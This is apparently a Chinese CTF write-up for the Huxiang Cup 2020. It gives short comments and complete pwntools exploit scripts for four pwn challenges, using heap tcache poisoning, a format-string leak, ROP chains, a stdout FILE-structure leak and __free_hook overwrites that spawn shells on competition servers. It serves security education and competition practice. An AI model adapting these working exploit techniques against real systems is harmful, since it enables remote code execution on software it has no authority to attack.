湖湘杯2020

难受,缺氧了,连着三天打完后,身体受不了附件

babyheap

挺简单的堆

from pwn import*
def menu(ch):
    """Pick menu entry *ch* once the ``>>`` prompt shows up."""
    choice = str(ch)
    p.sendlineafter('>>', choice)
def new():
    """Menu option 1: allocate a chunk.

    Nothing else is sent for this option -- the script never supplies a
    size or index, so the program must pick both itself.
    """
    menu(1)
def show(index):
    """Menu option 2: print the contents of chunk *index*."""
    menu(2)
    which = str(index)
    p.sendlineafter('?', which)
def edit(index, size, content):
    """Menu option 3: rewrite chunk *index* with *size* bytes taken from *content*.

    Index and size are answered line by line; *content* goes out raw via
    ``sendafter`` (no newline appended), so pass exactly the bytes to store.
    """
    menu(3)
    for prompt, answer in (('?', str(index)), (':', str(size))):
        p.sendlineafter(prompt, answer)
    p.sendafter(':', content)
def free(index):
    """Menu option 4: release chunk *index* (the slot may stay dangling -- the exploit relies on it)."""
    menu(4)
    which = str(index)
    p.sendlineafter('?', which)
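# Remote by default.  The original spawned ./main locally and then immediately
# rebound `p` to the remote socket, leaving an orphaned local process behind;
# pass `LOCAL` on the command line (pwntools `args`) to debug against ./main.
p = process('./main') if args.LOCAL else remote('47.111.104.169', 57303)
libc = ELF('./libc-2.27.so')

# --- heap grooming -----------------------------------------------------------
# Indices below assume the program hands out slots sequentially and reuses
# freed ones; the chunk size is fixed by the binary (the 0xF8/0xF0 edits
# suggest ~0x100-byte chunks -- confirm against the binary).
for _ in range(10):
    new()
for idx in range(9, 2, -1):     # 7 frees: enough to fill a 2.27 tcache bin
    free(idx)

free(0)
free(1)
free(2)

for _ in range(7):
    new()
new()
new()
new()

free(8)

for idx in range(6):
    free(idx)
free(7)
for _ in range(6):
    new()
new()  # index 7: the chunk everything below leaks through
edit(7, 0xF8, b'FMYY')

for idx in range(7):
    free(idx)
free(9)

for _ in range(7):
    new()
new()
show(7)

# --- libc leak ---------------------------------------------------------------
# The printed pointer is an unsorted-bin link, i.e. main_arena+0x60; on
# libc-2.27 main_arena lies 0x10 past __malloc_hook.  Bytes literals keep this
# working on both Python 2 and Python 3 pwntools (recvuntil returns bytes).
leak = u64(p.recvuntil(b'\x7F')[-6:].ljust(8, b'\x00'))
libc_base = leak - libc.sym['__malloc_hook'] - 0x10 - 0x60
log.info('LIBC:\t' + hex(libc_base))
free_hook = libc_base + libc.sym['__free_hook']
system = libc_base + libc.sym['system']
new()  # index 9

for idx in range(5):
    free(idx)
free(7)
free(9)

# --- tcache poisoning --------------------------------------------------------
# Write __free_hook into a freed chunk's fd, allocate twice to pull the hook
# out of the bin, point it at system, then free a chunk holding "/bin/sh".
new()
edit(0, 0xF0, p64(free_hook))
new()
# Only 7 bytes are sent, no terminator: this relies on the byte after
# "/bin/sh" already being zero in that chunk -- confirm.
edit(1, 0xF0, b'/bin/sh')
new()
edit(2, 0xF0, p64(system))
free(1)  # __free_hook("/bin/sh") == system("/bin/sh")
p.interactive()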

blend

异常的时候有个栈溢出,然后会跳回到main函数的结束位置,迁移到堆上执行ROP

from pwn import*
def menu(ch):
    """Answer the ``choice >`` prompt with option *ch*."""
    choice = str(ch)
    p.sendlineafter('choice >', choice)
def show_name(index):
    """Menu option 1 (print the current user).

    *index* is accepted for symmetry with the other helpers but is never sent;
    this helper is unused by the exploit below, which calls ``menu(1)`` directly.
    """
    menu(1)
def new(content):
    """Menu option 2: create a note whose body is *content*.

    *content* is sent raw (``sendafter``), so include the newline yourself
    if the program reads a line.
    """
    menu(2)
    body = content
    p.sendafter('input note:', body)
def free(index):
    """Menu option 3: delete note *index*."""
    menu(3)
    which = str(index)
    p.sendlineafter('index>', which)
def show():
    """Menu option 4: dump the notes (used to read back a heap pointer)."""
    menu(4)
def gift(content):
    """Hidden menu option 666: the one that overflows the stack (per the write-up).

    *content* is sent as a line, so a trailing newline is appended for you.
    """
    menu(666)
    payload = content
    p.sendlineafter(':', payload)
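# Remote by default; the original spawned ./main and then overwrote `p` with
# the remote handle, leaking the local process.  Pass `LOCAL` to debug locally.
p = process('./main') if args.LOCAL else remote('47.111.104.99', 51504)
libc = ELF('./libc-2.23.so')

# Format-string leak through the user name: stack slot %11$p is printed back
# as "Current user:", and on this build it holds a return address inside
# __libc_start_main (measured as __libc_start_main+240 -- confirm if the
# libc differs).
p.sendlineafter(':', '%11$p')
menu(1)
p.recvuntil('Current user:')
libc_base = int(p.recv(14), 16) - libc.sym['__libc_start_main'] - 240   # "0x" + 12 hex digits
log.info('LIBC:\t' + hex(libc_base))

# one_gadget offset for this libc-2.23 build; re-derive with `one_gadget`
# if the target ships a different libc.
ONE_GADGET = 0x4527A

# Note 1 carries the chain: 32 bytes of filler, then the gadget.  Bytes
# literals keep the str/bytes arithmetic valid on Python 2 and 3 pwntools.
new(b'FMYY\n')
new(b'FMYY' * 8 + p64(libc_base + ONE_GADGET) + b'\n')
free(1)
free(0)
show()
# The listing for index 1 now starts with a heap pointer; 0x1C80 is the
# measured offset of that pointer from the heap base.
p.recvuntil('index 1:')
heap_base = u64(p.recv(6).ljust(8, b'\x00')) - 0x1C80
log.info('HEAP:\t' + hex(heap_base))

# Trigger the overflow (write-up: the exception path returns to the end of
# main) and pivot onto the heap at note 1 + 0x28.  Only 7 pointer bytes are
# sent; the 8th byte is whatever the program leaves there after the newline
# sendline appends -- presumably NUL'd by the input routine, confirm.
gift(b'FMYY' * 8 + p64(heap_base + 0x1C80 + 0x28)[0:7])
p.interactive()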

pwn_Printf

非预期,按照Google CTF 的sprint逆向改的一个Pwn题,如果要逆出来,确实有点难度,但是可以直接跳过,最后就一个简单栈溢出

from pwn import*
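# Remote by default; the original created a local process and discarded it
# on the next line.  Pass `LOCAL` on the command line to run ./main instead.
p = process('./main') if args.LOCAL else remote('47.111.96.55', 55106)
elf = ELF('./main')
libc = ELF('./libc-2.23.so')

# Unintended path: sixteen answers of "32" get past the printf puzzle and
# reach a plain stack overflow (see the write-up text above).
for _ in range(16):
    p.sendline('32')

POP_RDI_RET = 0x0000000000401213
RETURN_TARGET = 0x4007D4   # address in ./main returned to after the leak; presumably re-enters the overflow -- confirm

# Stage 1: puts(read@GOT) to leak libc, then come back for a second overflow.
# The leading qword and the trailing puts@plt are kept exactly as in the
# original chain; the first one presumably lands in the saved-rbp slot.
rop = (
    p64(elf.got['read'])
    + p64(POP_RDI_RET)
    + p64(elf.got['read'])
    + p64(elf.plt['puts'])
    + p64(RETURN_TARGET)
    + p64(elf.plt['puts'])
)
p.sendline(rop)
# Bytes delimiters/padding work on both Python 2 and 3 pwntools.
libc_base = u64(p.recvuntil(b'\x7F')[-6:].ljust(8, b'\x00')) - libc.sym['read']
log.info('LIBC:\t' + hex(libc_base))

# Stage 2: one_gadget for this libc-2.23 build (re-derive with `one_gadget`
# for a different libc).  The 8 NUL bytes fill the slot before the return
# address.
ONE_GADGET = 0xF1207
p.sendline(b'\x00' * 8 + p64(libc_base + ONE_GADGET))
p.interactive()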

only_add

堆风水,直到比赛结束都没有布置出一个合理的堆结构,赛后花了两个小时成功构造出来,懒得再一步布置了,概率1/256爆破吧

from pwn import*
def menu(ch):
    """Answer the ``choice:`` prompt with option *ch*."""
    choice = str(ch)
    p.sendlineafter('choice:', choice)
def realloc(size, content):
    """Menu option 1: realloc the single chunk to *size* and fill it with *content*.

    *content* is sent raw (``sendafter``), so pass exactly the bytes wanted.
    """
    menu(1)
    p.sendlineafter('Size:', str(size))
    data = content
    p.sendafter('Data:', data)
def free():
    """Release the chunk: option 1 with size 0 (realloc(ptr, 0) frees)."""
    menu(1)
    zero = str(0)
    p.sendlineafter('Size:', zero)
def R(size, content):
    """Blind twin of ``realloc``: same inputs, but paced with short sleeps
    instead of waiting on prompts (presumably because the prompts are no
    longer readable once stdout's FILE struct has been corrupted for the leak).
    """
    for line in ('1', str(size)):
        p.sendline(line)
        sleep(0.1)
    p.send(content)
    sleep(0.1)
def F():
    """Blind twin of ``free``: option 1, size 0, paced with sleeps."""
    for line in ('1', '0'):
        p.sendline(line)
        sleep(0.1)
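libc = ELF('./libc-2.27.so')

# Two partial-pointer overwrites below each guess 4 unknown bits (1/16), so
# the whole run succeeds with probability ~1/256: keep retrying with a fresh
# process until the stdout leak looks like a libc address.  Local only --
# there is no remote target in this script.
while True:
    p = process('./main')
    try:
        # --- heap feng shui (all offsets measured against this binary) -------
        realloc(0x18, b'FMYY')
        free()
        realloc(0x4F0, b'FMYY')
        realloc(0x4F0 - 0x80, b'FMYY')
        free()
        realloc(0xF0, b'FMYY')
        free()
        realloc(0x100, b'FMYY')
        realloc(0x28, b'FMYY')
        free()
        realloc(0x48, b'FMYY')
        free()
        realloc(0x110, b'FMYY')
        realloc(0x38, b'FMYY')
        free()
        #######
        realloc(0x58, b'FMYY')
        free()
        realloc(0x68, b'FMYY')
        free()
        realloc(0x58, b'\x00' * 0x58 + b'\xF1')     # forge a 0xF0 size field
        free()
        realloc(0x68, b'FMYY')
        free()
        realloc(0x500, b'FMYY')
        free()
        # First 1/16 guess: 2-byte partial overwrite of a freed chunk's fd
        # towards _IO_2_1_stdout_.
        realloc(0xE0, b'\x00' * 0x68 + p64(0x31) + b'\x60\x67')
        free()
        #####
        realloc(0x48, b'\x00' * 0x48 + b'\xC1')     # forge a 0xC0 size field
        free()
        realloc(0x38, b'FMYY')
        free()
        # Second 1/16 guess.
        realloc(0xB0, b'\x00' * 0x38 + p64(0xE1) + b'\xD0\x96')
        free()
        realloc(0xD0, b'FMYY')
        realloc(0x70, b'FMYY')
        free()
        realloc(0xD0, b'FMYY')
        realloc(0x70, b'FMYY')
        free()

        # --- libc leak via stdout -------------------------------------------
        # Classic _IO_2_1_stdout_ trick: _flags = 0xFBAD1800, zero the three
        # read pointers, lower the low byte of _IO_write_base so the next
        # flush dumps memory in front of the write buffer.  The first qword
        # that comes out is (measured) the address of _IO_2_1_stdin_.
        realloc(0xD0, p64(0xFBAD1800) + b'\x00' * 0x18 + b'\xC8')
        leak = u64(p.recvuntil(b'\x7F')[-6:].ljust(8, b'\x00'))
        libc_base = leak - libc.sym['_IO_2_1_stdin_']
        log.info('LIBC:\t' + hex(libc_base))
        if libc_base < 0x7F0000000000:
            # A guess missed: what we read is not a libc address.  Retry.
            p.close()
            continue

        # --- __free_hook -> one_gadget ---------------------------------------
        # From here the script drives the program blind (R/F) rather than
        # on prompts; the write-up does not say what option 2 does.
        menu(2)
        R(0x80, b'FMYY')
        F()
        R(0x90, b'FMYY')
        F()
        R(0xA0, b'FMYY')
        F()
        R(0x88, b'\x00' * 0x88 + b'\xD1')
        F()
        R(0x90, b'FMYY')
        F()
        free_hook = libc_base + libc.sym['__free_hook']
        R(0xC0, b'\x00' * 0x98 + p64(0xB1) + p64(free_hook))   # tcache poisoning: fd -> __free_hook
        F()
        R(0xA0, b'FMYY')
        R(0x60, b'FMYY')
        F()
        ONE_GADGET = 0x10A45C   # one_gadget offset for this libc-2.27 build; re-derive for another libc
        R(0xA0, p64(libc_base + ONE_GADGET))
        F()                     # free() -> __free_hook -> one_gadget
        break
    except Exception:
        # A failed attempt usually surfaces as EOFError when ./main crashes.
        # Catch Exception rather than everything so Ctrl-C still stops the
        # brute force instead of being swallowed and retried.
        p.close()
        continue
p.interactive()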